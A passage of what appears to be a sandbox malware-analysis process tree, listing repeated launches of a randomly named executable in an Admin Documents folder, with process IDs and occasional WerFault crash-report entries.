- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:11828
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:12024
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 12024 -s 24
      4⤵
      PID:12264
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:12244
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:11640
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:12016
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:12256
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:3788
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:3500
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:12020
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:10040
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:11772
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:10244
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:11088
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:11708
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:2520
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:10308
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:11704
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:9548
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:10036
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:11044
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:6280
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:12328
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:12508
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:12760
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:13100
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:8696
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:10220
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:12324
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:4332
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:13332
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:13676
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:14004
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:13124
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:13804
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:14252
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:11368
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:15236
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:10528
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:1704
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1704 -s 24
      4⤵
      PID:15624
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:15576
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:15844
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:16224
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:15640
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:14808
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:16352
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:14744
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:16392
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:16872
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:7928
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:17664
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:18080
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:17024
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 17024 -s 24
      4⤵
      PID:14736
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:14668
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:11328
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:17904
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:17884
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:16036
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:17716
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:17544
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 17544 -s 24
      4⤵
      PID:18988
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:18916
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:19364
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:17412
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:15900
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:19500
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:19856
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:19536
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:20304
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:16500
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:19904
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:18492
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:14092
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:20420
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:16768
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:16164
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:12412
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:18184
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:12024
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:20576
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:20956
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:21308
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:15860
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:21328
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:21540
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:22020
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:22308
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:21388
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:18976
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:17816
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:20928
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:22396
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:23016
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:23392
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:22676
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:6052
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:20680
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:18568
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:21324
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:22452
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:656
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:18356
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:20560
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:23904
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:24200
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:23784
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:22748
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:24448
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:23660
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:24672
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:25172
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:25552
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:24916
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:19376
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:23596
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:23844
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 23844 -s 24
      4⤵
      PID:22216
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:22356
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:1936
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:17356
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:10580
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 10580 -s 24
      4⤵
      PID:24204
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:21748
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:25736
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:26024
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:26436
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:25812
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:26464
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:20572
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:21896
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:7896
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7896 -s 24
      4⤵
      PID:26604
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:25976
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:1212
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:26092
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:26908
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:27256
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:26628
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:27264
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:27424
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:27808
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:28436
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:12756
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:28560
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:28380
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:24624
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:28016
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:17396
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:25328
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:18264
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:28796
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:29100
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
